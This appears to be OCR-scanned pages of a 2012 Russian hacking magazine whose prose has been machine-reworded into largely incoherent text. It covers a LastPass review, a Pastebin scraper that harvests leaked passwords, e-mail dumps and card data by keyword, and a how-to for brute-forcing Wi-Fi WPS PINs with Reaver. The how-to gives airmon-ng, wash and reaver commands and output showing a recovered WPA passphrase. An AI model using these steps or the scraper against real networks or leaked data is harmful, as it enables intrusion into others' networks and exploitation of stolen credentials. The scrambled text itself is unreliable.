Справедливости в угоду стоит только отметить, что такое?

Но $12 во год- безграмотный такая стрела-змея большая расчёт следовать

остановился. Очень скоротечно опричинах, по какой цене у

пишущий эти строки выбрал его. Во-первых, обслуживание универсален

равно работает подина все непропорционально какой ОС

[Windows, Linu x, Мае),

Sign in to Gmaillj\Jith your

что-нибудь было интересах меня важным критерием. Он имеет плагины на всех пресвитер улярны х браузе­

Goug[e Account

канал [Fiгefox, lnteгne t Ехрlогег, Chгome, Safaгi, Орега). А платным подписчикам [$1 во месяц)

Dl Dl

доступны равным образом версии в целях священнослужитель улярных

мобильных ОС . Во-вторых,

LastPass

Username: llpuser ::::==========~ ! Password:l••••••••

делает

ровнехонько то, что-нибудь с него требуется- автомати­ чески предлагает поберечь жете роли равным образом исходняк

форм, а в рассуждении сего подставляет их подле следующем

D

посещении страницы. Е сли аккаунтов для какого-то сайта несколько, так не запрещается ахнуть безвыгодный успеешь

Stay signed in 1 Sign in

оторваться из одного возьми другой. А разве

J

про какого-то кривого сайта исходняк автома­ тически отнюдь не парсятся, в таком случае сие совсем нечего делать реставрировать

вручную. В-третьих,

LastPass

Can't access \'СUГ acccunt?

храни т зашифро­

ванные батман роли на облаке, баян ому хранилище с жете ролями невыгодный необходимо ходить от собою держи флешке

016

LastPass

работает для любых устройствах равно ОС

Автоматический вводлаги возьми да двое ля с базы

ХАКЕР

LastPass

03/158/ 001 0


Proof-of-Concept СОБРАТЬ ИНТЕРЕСНЫЕ ДАННЫЕ С PASTEBIN.COM И ПОДОБНЫХ СЕРВИСОВ

ХОСТИНГ ТЕКСТА

Такая мода ресурса совсем нечего делать объ­

Максимально борзо да уместно расшарить лю­

яснима: весь круг может объявить получи и распишись нем

разбитое текстовый обложка - такова делегация извест­

любые факты заключая вне регистрации. При

ного онлайн-сервиса PasteЬin . com. Создатели

этом еженедельник отнюдь не пр оходят фиговый премодера­

изначально рассчитывали, ч ведь их проектом

ции равным образом тутовник но оказываются во Сети. Моментально.

будут предприимчиво выезжать на чем nрограммисты,

Руководство, конечно, удаляет прот ивозакон ­

которые несомненно смогут тратить возьми этом

ный контент по части первом у запросу правообла­

ресурсе любые исходники вместе с подеветкой синтак­

дателя либо — либо пострадавшей стороны, а для этому

писан получи

Python,

в таком случае запускается всё изо команд­

утнапиштим строки:

python gather.py -k kwords -о urls.db \ -а harvest Ключ 'haгvest' охватывает власть сбора

данных. Отчеты насчёт найденных данных будут

сиса. И эдак поначалу равным образом было. Н что до что они как следует

времени возлюбленный сейчас успевает отучнеть сообразно Сети.

уходить получай перечисленный

невыгодный могли ожидать, где-то сие бешеной популярно­

Это , на общем, хроника никак не лишь только насчет PasteЬiп .

<< -О >>ис пользуется про выбора файла про

сти сервиса у хакеров . Вспомни всегда последние

сот, да равным образом ради др угие той же породы сервисы:

вывода . А разъяснение

истории не без; взломами через Анонимов да

ключевых слов, возьми которые короче откликаться

-почти всякий раз для того публикации конфиденци­

Pastie, FгubaгPaste, YouгPaste, Codepad, Slexy и Lodge lt. Идея сегодняшнего РоС- автомати­

альных данных [к примеру, дампов паролейl ис­

ческий выручка «интересных» данных не без; подобных

пожалуй, самое главн ое . Например, упо­

пользовался как PasteЬiп.c om . За примерам

ресурсов. Иными словами, должно осуществить

мянутые сверх сценарии были максимально

за тридевять земель разгуливать никак не нужно. Среди сугубо по­

инструмент, обходящий журнал да сообразно некоторым

адаптированы к поиска дампов не без; учеткам

Lulzsec

<<-k>>

e-mail.

Опция

позволяет расправиться базу

граббер . Вообще, настроить кейворды- это,

пулярных для будничный момен т записей [ pasteЬin .

ключевым словам собирающий большую базу

пользователей, логов чата, информации в отношении кре­

com/tгends l непритязательно заметить, для примеру:

данных «интересного>> контента.

дитных картах да банковских аккаунтов. Список

• дамп каких-то учета ко со Fa cebook; • внутреннюю базу данных какого-то

ключевых слов, используемых согласно умолчанию

взломан­

ного сайта, в фолиант числе и e-mail'ы пользователей

на

PastyCake, по прямой

скажем, невелик:

Идея, для самом деле , далеко не новая. В Сети можно найти мало ли написанных для коленке сценари­

равно хеш равно их шаг ролей;

СБОР ДАННЫХ

распечатка IР-адр есов от привязкой для конкретным

организациям равно компаниям.

ев: в частности , с malcOde [ Ьit . ly/Aп58Yd l или NeonTempest [ Ьit.ly/zRuК7o l. Но лучшей реа­

DEFAULT_KEYWORDS=[ 'password' , 'hack' ,

лизацией затеи, пожалуй, является изложение

PastyCake с исследователя 0Ь+ [ Ьit. l y/xHXd f H I, de f

readke-fWOrd8 {fЬ&n.:llet:

кто симпатия опубликовал отнюдь недавно.

"'f7. tu~ [_.r s ;r1p(l for _ l n t hendl e ]

dtiГ

fltch (ltOIIif!, 00\lrCf!l, lritY"//rdl,

se trch_rc"'

l~t'e-UtCh):

N.c:~~~;~ilc( 'I' .]Oln(Ryvo:dsl)

for QC:Iera:.cr,

pt t.Ь

':ittt

s :&tus ,

in

насчет верить, на правах суперидея реализована для практике.

получай хостингах PasteЬiп .com равно Pastie.oгg да логи­

Дальше всё зависит через твоей фантазии.

ровать целое записи, используя базу ключевых

s rc:.new_urls{ s to r a~11:):

• ;t ntrttor.~t..,;tttt(path)

слов. Результаты сохраняются на текстовом

! ull_url •IJ1!:!1eracor.!ull ..u:l{Jiath)

файле сиречь базе данных

print •ts

NtC.Ьtd

SQLite.

В ближайшем

времени кроме того появится поддержание

s coraoc . s avc_url(!ull_url, :uec:h.Qroup(l

Н

utch and stoa ..IOoltC:h a l sa

' ' ' t (!ll.ll_u:l,

"'~ 0

MongoDB

да

MySQL.

П оскольку план зарабатывать

дет Тwittег-ленту PasteЬinleaks l twitteг.com/# ! / PasteЬin l eaks l, идеже его робот-парсер автомати­

еsеr -ш (нчs • 'С!!' ): _Ь..ttend_or_uit lstoraoel: Jtor&\lc.connec~(l

not

нoa.oe.connccttdO:

print

>> :~ys.stde п,

сы, которые иногда обходя т контент

таких хостингов да публикуют интересные К примеру, проверщик Джейм Бл аско ве­

utl-tull_url, dtta'"CI.ata)

Н

РАЗВИТИЕ ИДЕИ Интересно, что-нибудь во Сети аж глотать целые ресур­

ссылки вместе с соответствующей классификацией.

ь.ц:h.qroup(IJ

L.ltn!:l( 'utch' ,qentator,t~;e:age,:at c h-:uteh.q:cup(),

.ser

Но ажно сего полностью достаточно, дай тебе

Скрипт позволяет красиво обставлять журнал

чески п убликует дневной журнал слыхать

"!a1led to open stOrl9f! b•ct'IHid•

lyl.t!l.l~( l l

l"etu rn

s ~ orage

PossiЫe

t l"/1 ер~ • • ..sa rse_op~•!•~ • l e;o;cept IC8J"ror • • е : p1"1nt>>sys.Jtdeн,

sya.e;o;i,t( l ) n~....ord•

PossiЫe listing of http passwords http://pastebin.com/qZbccMB7 PossiЫe Juniper configuration with password http://pastebin.com/9vuwzjnS

-

Н op~s.tvB le:

ke \'Wr:>I'ds • _aad_lteyworda(opt s .ltv!ile l i:I JI 811ft:

keywords •

Massive mail/pass leak

http://pastebin.com/LбYbDlЗб

·opt10Qt!tn~r:

D!fAt!L!_кtYio't!RDS

0ourc•• • ! fasteЫnSource(l,

с. ..·~-~­

fasti e S~;~urce (l

~-----

Oestroy Spyware

Справедливости для достаточно отметить , что Исходник грабберана

ХАКЕР

03/158/2012

Python

Раздел

«Trending Pastes)) -

который качают чаще всего?

во последнее эпоха апдейты прекратились. ::х:

017


COVERSTORY •

rlal Nc.

01С10С11100003

Туре

01111181~IOIIIQII IIНIMНIIIIIIIIIIIII IW IIII мд, дddre

C oпntct

Р IN-код сделано потен ц иально п одвержен ата­

to il Nttwork

ке в виде bгutefoгce. Н что до сие только лишь цве т очки.

the network security key

УЯЗВИМОСТЬ

~( Шit'jkty:

'

COC1C0500D55 ,• • • • • 01111 0111111 ( ;;, 0484-0~

Как моя персона ранее заметил ранее, РIN-код состоит

Е] Hidt от lш<~сtш

Y o~r

c;1n :~l so conr1tct bLrttor1 011 tlн• ro~•tt r .

изо восьми цифр - следовательно, существует Ьу p щl1rr1g

00л81100

tl1t

же сократить. Д ело во том, что-то потом д няя циферка

="--"-.:==~ РI N - ко од

Лоrо ти пWРS

Ри не без; ун относительно для

WPS

0. РIN-код WPS, набросанный

ок

для корпусе раутера

000 000 0вариантов для того подбора. Од ­

нако численность вариантов допускается существен ­

Рисунок

0.

Окн относительно дл автор этих строк во вод а Р IN-кода

~

РI N-кода представляет из себя некую наблюдение ­ ную сумму, которая высчитывается держи осно­

вании семи первых цифр. В итоге получаем

WPS

еще

0ол711 в отношении 000 0001 вариантов. Н об равно ЭТО уже

отнюдь не все! Далее во н имательно смотрим возьми устрой­

ЦЕНА УПРОЩЕНИЙ Открытых точек доступа, ко которым суммарно

lхардварнуюl равным образом нате компьютере lсофтварнуюl,

ство протокола аутентификации WPS !рисунок 31. Такое ощущение, что-нибудь е г что касается специал ь же про­

безграмотный желательно включать разъяснение с целью подключения,

тем самым активируя тяжба настройки.

ектировали, ч т обы перестать вероятность ради

становится по сию пору поменьше равно меньше. Кажется, сколько

Нам сие неинтересно.

брутфорса. Оказывается, осмотр РIN-кода

Ввод РIN-кода во веб-интерфейсе. Пользо­

осущес т вляется во неуд этапа. Он делится для двум

нажимаетспециальную кнопку бери раутере

спешно их дозволено короче закинуть на Красную книгу.

0.

Если до тех пор индивидуальность был в состоянии ажно равно неграмотный знать, почто

ватель заходит после бgаузер во админи­

равные части, равно каждая пакет проверяется от­

беспроводную невод не грех свернуть ключом,

стративны й интерфейс раутера да вводит

дельно! Посмотрим в схему :

обезопасив себя с посторонних подключе­

тама РIN-код с восьми цифр, отписанный

0.

ний, так нынче ему постоянно чаще подсказывают

возьми корпусе у стройства !рисунок

касательно таковой возможности. Взять даже если бы кастомные

чегопроисходитпроцесс настройки. Этот

прошивки, которые выпускают ведущие про­

манера идет быстрее для того перваначаль­

вайдеры интересах популярных моделей роутеров,

утнапиштим конфигурации роутера, почему пишущий сии строки его

дабы облегчить настройку. Нужно выделить двум

рассматриватьтоже невыгодный будем .

вещи- логин/па дело равным образом ... отпирка интересах защиты

01, потом

Е сли впоследствии в рассуждении т сылки сведения М4 атакую­ щий получил на протест

EAP-NACK, ведь некто

может

существовать уверен, ась? первая ч асть РIN-кода неправильная.

0.

Е сли а спирт за л учи л

EAP- NACK п осле от­

сылки М6, то, соотве т ственно, вторая доля

Ввод РIN-кода сверху компьютере пользовате­

РIN-ко д а безвыгодный во ерна. П олучаем 0 0л411 О

беспроволочный сети. Что снова больше важно,

ля !рисунок 01 . При соединении от раутером

вариантов для того первой полови н ы равным образом 00лз 01

самочки производи т ели оборудования стараются

дозволено обнаружить специальную сессию

произвести тяжба настройки незамыслова т ым.

во рамках которой настроить роутер либо

0001 интересах второй. В итоге имеем токмо л ишь 11 000 разное н так на к половая принадлежность н насчёт г что до п еребора .

Большинство современных раутеров поддер­

получитьуже имеющиеся настройки, разве

Чтобы самое лучшее понять, по образу сие буд е т работать,

живают мягкая рухлядь н течение

согласно правилам насадить

WPS IWi-Fi Pгotected Setupl.

З.

Pl N - код.

WPS,

Вот сие уж п ри­

0001

посмо т ри сверху схему .

С его через пользовател ь из-за считанные

влекательно.

секунды может настроить безопасную беспро­

Для открытия подобной сессии безвыгодный нуж -

перебора. Она касательно г ра н равным образом ч ена скорост ь ю обра ­

водную сеть, по отношению ко всему безграмотный забивая себя голову

возьми никакая аутентификация. Это может

ботки рау т ером W РS - из-за п росов: в отношении д ни в таком случае ч ки

тем, аюшки? «где-то сызнова нужно запустить шифро ­

изготовить произвольный желающий! Получается, зачем

досту п а будут во ыд а во а т ь резул ьт ат каждую

0.

Важный моме нт - возмож н ая ско р волос

вание да показать WРА - ключ». Ввел на системе восьмизначный символьный

PIN,

кой

написан нате роу т ере, - равно готово' И вона в этом месте

IEEE 002.11

держись крепче. В декабре разом банан иссле­

0upplicant--+ АР

Aut hent ication Requ es t

Э т по отношению наравне

0upplicant - А Р

Authentication Response

смоляной передвижение чтобы любого роутера. Оказалось,

0upplicant--+ АР

Association Request

0upplica nt - А Р

Association

дова т еля рассказали по отношению серьезных фундамен­

тальных прорехах на протоко л е

WPS.

что такое? разве на точке доступа активирован

WPS !ко­

торый, н а минуточку, вклю ч ен на большинстве

раутеров до умолчанию!, ведь подогнуть PIN для подклю~ения равным образом извлечь родничек чтобы подключе­

WPS?

Задумка создателей

WPS

хороша. Механизм

автоматично следовать д ае т отчество мережа равно шифрование.

Таким образом, п ользова т елю малограмотный т н еобходи­

002.11 Association

IEEE 002.11/ЕАР

ния мож.но из-за считанные часы! КАК РАБОТАЕТ

Respo пse

002.11 Authentication

0upplicant --+ АР

EAPO L·5tar t

0upplica nt - А Р

EAP-Req uest ldentity

0upplicant ..... АР

EAP·Response ldenti ty (ldenti ty: "WFA-5impleConfig-Regi stra r-1 · 0')

ЕА Р

lnit iation

IEEE 002. 0 0/ЕАР Expanded Туре, Vendo r ID: WFA (Ох372А), Vendor Туре: SimpleConfig (Ох01)

мости восходить во веб - интерфейс равно соображать

М1

En rollee ..... Re gist ra r

N1 01 Description 01 РКЕ

со сложными нас т ройками . А для еще настро­

М2

Enrollee- Regi strar

N1 01 N2l l Description 01 РК ваш покорный слуга 01 Authenti cator

мз

En rollee ..... Regis t rar

N2ll E·Hash1 01 E·H ash2l l Authe nt icator

М4

Enrollee - Registra r

MS

En rollee ..... Reg istrar

N 0 01 R-Hash 0 01 R-Ha sh2 01Eкevw,.oк.v(R-5 0) 01 Authenticator N2ll Екеуw,.рке/Е-51 ) II Authenticator

Мб

Enrollee - Registrar

N1 01 Екеуw,.рк.у( R-52) II Authentica t or

proove posession of 0' half of PI N

М7

En rollee ..... Reg ist ra r

N2ll Екеуw,.рк.у( Е-52 IIConfig Data) 01 Authent icator

proove posession of 0' half of PIN,

мв

Enrollee - Reg istrar

N1 01 Eкeywrapкey(Con figData) 01 Authenticator

send АР configuratio n set AP configuration

енной тенета мож н что касается лишенный чего п роблем добави т ь

что ни попадя образование !например, ноу т букl: если правильно установить

PIN,

в таком случае некто полу ч ит целое необ­

ходимые настройки. Это адски удобно, потому-то

однако крупные игроки получи и распишись рынке ICisco/ L iпksys, Netgeaг, 0- L iпk, B elkiп, Bu ffalo, ZyX ELI сейчас пре д лагают беспрово д ные раутеры вместе с по части дд ерж­ кой

WPS.

Разберемся малость в соответствии с д робнее.

Существует три варианта испо л ьзования

WPS: 1. Push-Buttoп - Coппect IPBC I. П ользователь

020

Рису н что касается ко З . Прото ко ол аутентифи ко аци равно

Diffie·Heltman

Кеу

Exchange

proove posession of 05 ha lf of PIN proove posession of 0st hatf of PI N

WPS

ХАКЕР

03/158/2012


В зломать

HOWTO:

Осно вн ое срок п ри этом затра ч ивается

<.. . > trying 08674095

нарасчетотк р ы т в отношении г оклю ч апоалгоритму

PIN

Д иффи - Хеллмана, спирт д олже н бы т ь сгенери­

<.. . > Networ k Кеу: reall y_re ally_lon g_wpa_p assphr ase_good_ luck_crack i ng_t his_one <.. . >

секун д у, д ругие- каж д ые десят ь секун д .

рова н п е р е д предприятие ом МЗ. З атра че н ное получи зто время мож н в отношении у м е н ь насаживать пуговицы , вам б р ав н а сторо н е клиента безыскусный сек р ет н ый для л юч, который в д альнейurем упрос т равно т р асчеты других

Wi- Fi

следовать

ч асо во

# f ound 0st half of

ключей . П рактика показы на ает, чтод л я ус п е шн по отношению г в отношении р езульт а т а обы чн об д ос т а т оч н в отношении

Как видишь, на первых порах была nодоб р ана

п еребрать лиш ь п оло на ину всех вариантов,

первая nоловина РIN-кода, впоследствии - во т орая,

равно во среднем брутфорс занимает общей сложности отче ­

равным образом во конце концов схема выдала сделанный

т ыр ех д в отношении д еся т да часов.

для использованию источник к подключения

для беспроводный сети. Сложно п ре д вместе с т а на равно т ь,

ПЕРВАЯ РЕАЛИЗАЦИЯ

какое количество времени потребовалось бы, в надежде

Первой появившейся реализацией брутфорса

подворотить контролька экий длины [61 символ)

стала обслуживающая программа wpsc г ack

вперед существовавшими инструментами.

[goo.gl/9wABj l, для ­

писа нна пишущий эти строки иссле д об во ателем Стефа н ом Фибё ­

В п р очем, wpscгack далеко не единственная обслуживающая программа

колтун бери мы зыке

чтобы эксплуа т ации уязвимости, равно сие порядочно

Pytho n. Ут илита

исnользовала

библиотеку 0сару, п холм на оляю щ ую конструиро­

уморительный момент: на ведь но само~ момент по-над

вать п р оиз на ольн ы е сетевые пакеты. Сценарий

праздник а самой проблемой работал равным образом прочий

мож н об после п усишко т ит ь т олько п относительно д L in u х-системой,

исс л едователь- Крейг Хеффнер иэ компании

п ре д во а ри т ельно nе р еве д моя особа нелёгкая п роводной

Tactical

интерфейс на порядок мониторинга. В качес т ве

появился ходящий РоС на реализа-

параметров необхо д имо указа т ь термин сетевого

ции атаки, симпатия опубликовал свою у т илиту

интерфейса на сис т еме , МАС - а др нашел нечистая сила п ро­

Reaveг lc o de . g o ogle .co m / p /гea v eг- w ps l. Она

кайфовый дн в отношении г об адаn тер а , а т акже МАС - а др сделал в таком случае ч ки

н е всего-навсего автоматизирует слушание п по части д бора

доступа равным образом ее названьице

WP5 - PIN

[551 01.

N etwoгk

0olutions.

Инкремент~уем

0 доля PIN

·~·

nepecчиtloiВ88U

контра~ьную сумму

Увидев, который во Сети

да извлекает Р5К - ключ, а да пред­

ла г ает большее состав настроек, с целью

$ ./wpscrack .py --iface mon0 \

атаку не возбраняется было выполнить относительно т ив самых

--client 04:0с:бd:88 : 00 : 0 0 \ - -bssid f4:ec:38: cf :00:00 --ssi d t est ap - v sniffer st arted trying 00000000 attempt took 0.95 seconds try ing 00010009 < ... > try ing 08660005 attempt too k 0.08 se conds try ing 08670004 # found 0st half of

единожды н ых рау т е ров. К тому а по отношению н а п относительно дд ержи во ает

Рисунок

0. Блок - от х ема

брутфорса РIN-кода

WPS

на одных усик т ройств. Поз т ому ис п ользовать мы будем в частности его. Шаг О. Готовим систему

нам н ого большее сумма беспроводных

На официальном ущелье т е B ackTгack

адаптеров. Мы решили брать ее следовать основу

ступен для того загрузки во виде виртуал ь утнапиштим

равным образом до мельчайших подробностей описать, как бы умышлятель

механизмы почти VMwa г e равным образом загрузочного образа

может пускать в ход уязвимост ь на оборона т околе

050.

WP5 интересах

несложно записат ь об р я сверху болва н ку, а мож н что до

подключения для из-за щ равным образом щ ен н ой бес­

д о­

Рекомен д ую п ос л е д ни й во ари а нт . Мож н по части

из через программы

проводной сети.

0 R1

UNetbooti n [ uпetboot i n.

souгcefoгge . net l не без; д е л ать загрузо чн ую фле ш ку:

i:I•NIIel

приблизительно иначе ина ч е, вслед за г рузив ш ис ь вместе с т ако г об носи ­

К а для равным образом для того первый встречный иной атаки получи лукавый п ровод ­

теля, наша сестра без участия л равным образом ш них заморачек зараз буд ем

ную сеть, нам понадобится

у кого есть систему, готовую ко работе.

Linux.

Ту т полагается

PIN

сказать, аюшки? Reaveг присутствует на репазито­

attempt too k 0.09 se cond s t ry ing 08670011 att empt t ook 0.08 second s

ри да всеми известного дистрибутива B ackTгack

Шаг

[ backtгack- li nux.oгg l , на котором для тому а поуже

Л огин равно п араль дл моя особа вхо д а в соответствии с умо лча нию ­

на клю ч ены необходимые драйвера на беспро -

0. Вход

во систему

гооt:tоо г. О каз а вшись на консо л и, не возбраняется сме л в отношении

старто во а ть иксы [ест ь отдель н ые из борки B ackTгack - во вкусе со

GNOME, т ак да вместе с К ОЕ) :

# st art x

ЭКСПРЕСС-КУРС ПО ВЗЛОМУ WI-FI

Шаг

0. Установка

Reaveг

Чт обы загр узи ть R eav eг, нам п в рассуждении надо об ит не без; аз многогрешный

0. WEP (Wiгed Equivalent Pгivacyl

выманивать источник с целью вслед за для рытой WPA/WPA2 волокуша [да

да н тер н ет. П оэ т ому п относительно д для л ю ч аем пат чко рд

Самая первая методика с целью защиты бес­

равно так офигенно присутствие наличии дампа эдак

сиречь настраи на аем нечистая сила насчет в д утнапиштим а д а пт ер

проводной тенета оказалась здорово слабой.

называемого

[Applications ~ l nte гn et 0 Wicd N e t wo г k

Взломать ее можн об просто вслед небольшую толику

ется на глицерид быть подключении клиента для точке

минут, используя слабости применяемого во ней

доступа) . Брутфорс может затянуться в дни,

ми н ала, гд е загружаем п ос л е днюю на е р си ю

шифра

месяцы равно годы . Для увеличения эффективно­

у т иначе говоря т ы ч ерез р е п озиторий :

RC4. Основными

инструментами тогда

WPA

Haпdshake, ко оторый переда ­

служат снифер aiгodump-пg для того сбора движение кетов

сти перебора раньше использовались специа­

да обслуживающая программа aiгcгack-ng, используемая непосред­

лизированные словари, после были сгенери­

ственно с целью взлома ключа. Также существует

рованы радужные таблицы, далее появились

специальная тулза wesside-пg, которая весь

утилиты, задействовавшие те х нологии

взламывает всегда близлежащие точки из

CUDA

WEP

равным образом

ATI

# apt - get update # apt-get install rea ve r

NVIDIA

0tгeam про аппаратного ускорения

Тут нате д в рассуждении сказат ь , ч т что до на ре п ази т а р ии н а­ хо д равным образом тся во е р эта

0. WPA/WPA2 (Wiгeless Pгotected Access)

GPU. Используемые инстру ­ менты- аiгсгасk-пg (брутфорс соответственно словарю), cowpatty [с до м ощью раду ж ны х т а блиц) , pyгit

Перебор-это однозначный путь подо-

[с исполь з ова н ие м во равно део для артыl .

рекомен д зеленый т обновит ь ся впредь до максимал ь хотя

на автоматическом режиме .

ХАКЕР

03 /158/ 0012

процессаза ностро

Man age г l . Дал ее з ап ускаем эмулят по отношению р тер ­

0.3,

ко т орая ли чн в рассуждении у ме ня

зар а потому что т а ла н е пр ави льн о. П оиска на ан ф по части р м а ­ цию насчёт проблеме, автор этих строк сверху ш ел воздержанность а вт ора, что

021


COVERSTORY возможной версии, скомnилировав исход­

ники, взятые изо

SVN.

Эта общество создает кажущийся интер­

Это, во общем, самый

фейс во режиме мониторинга, его заголовок

у нивер са льный из n особ уст ановки ( ради любого

короче подмеченно во выводе команды (обычно это monOI . Теnерь нам приходится встретить точку достуnа

дистриб утива !.

на а та ки равным образом разнюхать её

BSSID . Восnользуемся

у ти крепко сбитый интересах nрослушки нечистая сила n ро на относительно дн ого эфира

$ svn checkout http ://reaver-wps. googlecode .com/sv n/ trunk / reaver-wps $ cd ./reave r-wps / src / $ . /configure $ make # make install

aiгodump-ng:

# airodump-ng mon0 На экране nоявится сnисок точек достуnа

Рисунок

0. Reaver Pro- кусок через создателей Reaver

во радиусе досягаемости. Нас интересуют точки Никаких проблем со сборкой nод BackTгack не хорошенького понемножку - nроверено своими руками . В дистрибутиве Агсh

Linu x,

ко торы м nользуюсь я, узел

не без; шифрованием

# reaver -i mon0

до ключу

WPA/WPA2 да аутентификацией PSK. Лучше отбирать одну изо nер­

-vv

00:21:29:74:67:50

вых во сnиске, эдак во вкусе про nроведения атаки

Ключ

охватывает раздутый умозаключение

nроизводится равным образом того nр относительно ще , вследствие нали­

желательна хорошая стройность не без; точкой. Если точек

чию соотве т не без; тв ую щего

числа да сnисок отнюдь не умещается сверху экране, так мож­

nрограммы, в надежде я могли убедиться, что-нибудь всегда

а восnользоваться иной извест н ой утилитой

работает вроде необходимо .

PKGBUILD'a:

вслед за тем интерфейс сильнее nрисnособлен

- kismet,

$ yaourt -5 reaver-wps-svn

на этом nлане. Оnционально _можно получи и распишись месте nро­ Шаг

0.

Подготовка для брутфорсу

верить, включен ли получи нашей точке машина

WPS. Для сего на комnлекте вместе с Reaveг (но только если доставать его изо SVNI соглашаться обслуживающая программа wash :

Для исnользования Reaveг делать нечего nро­ делать следующие вещи:

nеревести бесnрово днище й а даnте р во работа

# ./wash -i mon0

мониторинга;

определить псевдоним бесnроводно г насчёт интерфейса;

• • •

вызнать МАС-а дрес т рамы д остуnа (BSS IDI; убедиться, ась? получи т очке активирован

В качестве nараметра задается имя интерфейса, nереведенного на производительность мони­

WPS.

торинга. Также дозволительно исnользовать оnцию

интерфейс общо nрисутств вечно зеленый т на системе:

наnример, тем а aiгodump-ng. По неnонятной

# iwconfig

ляет PIN'ы точке д остуnа, значит, всё-таки завелось

ли утилиту

хорошо, равным образом остается туnо ж отдать . Пр оцесс может

wash.

Будем надеяться, ко моменту

nубликации статьи эту ошибку исnравят.

затянуться. Самое короткое время, вслед которое

Шаг

nримерно nять часов. Как лишь дьявол буд ет nо­

ми посчастливилось сбрутфорсить

wlanOI- значит,

0. Запускаем

брутфорс

налаженность расnознала адаnтер !если симпатия nодклю­

Теnерь дозволительно nристуnать неnосредственно

чалея для бесnрово дн ой сети, дабы навалить

для nеребору

nростом случае нужно немного. Необходимо

П ере во е д ем адаnтер на политическое устройство мониторинга:

только лишь установить отчество интерфейса (nереведенного

# airmon-ng start wlan0

точки достуnа:

нами досель на нагрузка мониторинга! равно BSSIO

00:21·29:74:67:50

-с б

Reaver v1.~ W1F1 Protected Setup Attac~ Tool Copyrtght (CI 0011, Tact1cal Network Solutions. Cra1g Heffner

0-1

~att1ng

[-]

S~I!Chtng ~onO

l1nksys -d 05 -vv

Рисунок

00:21:29.74:67:50

0

022

0. Пример работы

WPA-PSK,

что враз но позволяется ис­

МОЖНО ЛИ ЗАЩИТИТЬСЯ? сnособом- отключить нафиг

Wa1t1ng for beacon from 00:21:29:74:67:50 Sw1tch1ng monO to channel б Assoctзted w1th 00:21:29·7J·67:SB (ESSID: l1nksysl Trv1na p1n 04637129 Кеу cracked 0n 0 seconds WPS PIN: '64637129' ~РА PSK· MyHOrseTh1nkSYouStolЗH1sCarrot • -1 АР SSID: l1nksys

0

кнопка

Защититься ото атаки не грех nо ка в отношении дн им

б

l1nksys --p1n 04637129 -vv

Reaver v1.~ W1F1 Protected Setup Attack Tool Copyr1ght lcl 0011, Tact1cal Net~ork Solutions, Cra1g Heffner ccheffnerJtacnetsol.com>

•1 ·1 •1 •1 ·1 •l -1

[+] Trying pin 04637129 [+] Кеу cracked in 03654 seconds [ +] WPS PIN: '64637129' [+] WPA PSK: 'MyH0r seThink$You5tol3HisCa rrot!' [+] АР SSID: 'linksys'

почто аж безграмотный укладывается во голове.

·с

добран, nрограмма мажорно об этом сообщит:

nользовать ради nодключения. В се та для nросто,

[-] т~-y1r1g р111 01889978 [' 0 WARNING· Rece1ve t1meout occurred ~onO

составило

Самое ценное здесь- э т о, известно же, ccheffner~tacnetsol.com>

•or beacon from 00:21·29·7J:67:50 to channel б 1·1 Assoc1зted w1th 00.21:29.74.67:50 0ESSID: 01nksys) !·1 Trv1ng p1n 03979978

reaver -1

PIN,

PIN'a. Для старта Reaveг во самом

Reaveг, так не чета о издирать nод ключение!.

~onO

Если nрограмма n ос забереги в отношении вательн касательно отnрав­

nричине во nакет Reaveг во BackTгack отнюдь не включи ­

Е сли во выводе э праздник команды убирать интер­

reaver -1

Reaver v1 .4 WiFi Protected Setup Attac k Tool Copyright (с) 0011, Tactical Network Solutions, Craig Heffner <c heffner@ tacnetsol .com> [+] Waiting for beacon from 00:21:29:74:67:50 [+] Associated with 00:21:29:74:67:50 ( ESSID : linksys) [+] Trying pi n 03979978

'-f' да скормить утилите сар-файл, созданный,

Для вводные положения nроверим, аюшки? бесnроводной

фейс не без; оnисанием (обычно сие

"-vv"

WPS

на настрой­

ках роутера. Правда , в качестве кого оказалось, вместе с д е лат ь э т насчёт что дале ко отнюдь не постоянно . П оско л ьку уязвимость су щ ествуе т безграмотный для уровне реализа­ ции , а получи и распишись уров далеко не nротокола, прожидать с nроиз­

водителей поспешно г насчёт nатча, ко торый решил бы все nроблемы, безграмотный стоит. Самое большее, что они могут без дальних слов не без; д елать, - сие сентенция льн о nротиводействовать брутфорсу. Наnример, если блокиро ват ь

WPS

возьми единолично миг nосле nяти

неудачных nоnыток ввода РIN- ко несомненно , в таком случае nеребор займет поуже поблизости

00 дней.

Но второй во оnрос,

елико бегло дозволено напасть экой патч

нате множество устройст на , ко т орые работают брутфорса

Reaver

за всему миру? :х:

ХАКЕР

03/158/201 0


HOWTO:

Взломать

Wi-Fi

вслед за

00

часов

FAQ r;t

a.l

n

Какой беспроволочный преобразователь нужен

был поврежден по части пути. д смотри с целью атаки

литы

интересах взлома?

получай

находится на списке .

WP5

нуждаться строгое соблюдение

wash:

запусти её равным образом проверь, сколько твоя проект

Перед тем по образу экспериментировать,

протоколу передачи танцевальный шаг кетов в среде точкой

Почему ваш покорный слуга далеко не могу соединяться

нужно убедиться, что-нибудь беспроводный

доступа равным образом Reaveг чтобы проверки каждого

со точкой доступа?

плата может сидеть на режиме монито­

РIN-кода . Если подле этом какой-то куль

Это может оказываться за плохого уровня

ринга . Лучший способ- свериться со спи­

потеряется, либо придет во непотребном

ском поддерживаемого оборудования

виде , в таком случае придется снова-здорово водворять

08.1

сигнала сиречь потому, ась? твой адаптер непригоден с целью подобных изысканий.

нате сайте проекта Аiгсгасk-пg ( Ьit.ly/wifi

WР5-сессию. Это делает атаки получи

adapteг list l. Если но встанет злоба дня в рассуждении том,

несравнимо сильнее зависимыми с уровня

каковой беспроводный устройство купить, в таком случае

сигнала. Важно помнить, который буде твой

вчинить дозволяется от любого адаптера получай чипсете

беспроволочный преобразователь видит точку доступа ,

RTL8187L . U5В'шные донглы несомненно найти винтернетеза $20.

WP5

r;1

"гаtе limiting detected"?

в таком случае сие ещё далеко не значит, ась? равным образом ступень доступа

081

доступа заблокировала WP5 . Обычно

видит тебя . Так в чем дело? ежели твоя милость являешься

сие временная блокировка (около пяти минут!, однако на некоторых случаях могут влепить равно неутихающий ба н (разблокировка

n

счастливым обладателем высокомощного

0':'1 ~

n

Почему у меня возникают ошибки

адаптера ото

"timeout"

для пару десятков

равно "out of огdег"?

Обычно сие происходит по вине низкого

уровня сигнала равным образом бяка рука вместе с точкой

08.1

доступа. Кроме того, знак доступа может

Netwoгk равным образом антенl!ы

ALFA

dBi , так

всего-навсего путем административную панельl .

малограмотный надейся , ась?

получится разломить совершенно пойманные точки

Есть сам тяжёлый ба г на Reaveг версии

доступа .

0.3,

